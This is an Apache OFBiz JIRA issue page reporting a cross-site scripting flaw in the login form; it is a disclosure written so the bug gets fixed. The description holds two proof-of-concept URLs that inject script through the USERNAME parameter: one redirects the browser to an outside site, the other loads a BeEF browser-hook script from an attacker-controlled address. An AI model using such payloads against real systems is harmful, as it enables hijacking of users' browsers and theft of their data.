[OFBIZ-1476] XSS vulnerability in OFBiz Login Form - ASF JIRA

XML

Word

Printable

JSON

Details

Type: Bug
Status: Closed
Priority: Major
Resolution: Duplicate
Affects Version/s: None
Fix Version/s: None
Component/s: product
Labels:
None

Description

Hi,

There is a Cross Site Scripting vulnerability in OFBiz login form that allow a attacker to stole user's data.

PoC:

Redirection to another site:

https://demo.hotwaxmedia.com/ecommerce/control/login?USERNAME=a%22%3E%3Cscript%3Edocument.location.href%3D%27http%3A%2F%2Fwww.bindshell.net%27%3B%3C%2Fscript%3E%3Ca+name%3D%22a

BeEF injection:

https://demo.hotwaxmedia.com/catalog/control/login?USERNAME=a%22%3E%3Cscript%20language=%22javascript%22%20src=%22http://192.168.4.2/beef/hook/beefmagic.js.php%22%3E%3C/script%3E%3Ca%20name=%22a

Same thing using "PASSWORD" instead of "USERNAME".

Bye

Attachments

Issue Links

is a clone of

OFBIZ-178 Cross site scripting vulnerability in Forum

Closed

is part of

OFBIZ-1525 Issue to group security concerns

Open

Activity

People

Assignee:: Jacques Le Roux

Reporter:: Emmanuel Saracco

Votes:: 0 Vote for this issue

Watchers:: 1 Start watching this issue

Dates

Created:: 02/Dec/07 02:26

Updated:: 24/Mar/21 10:35

Resolved:: 02/Dec/07 10:04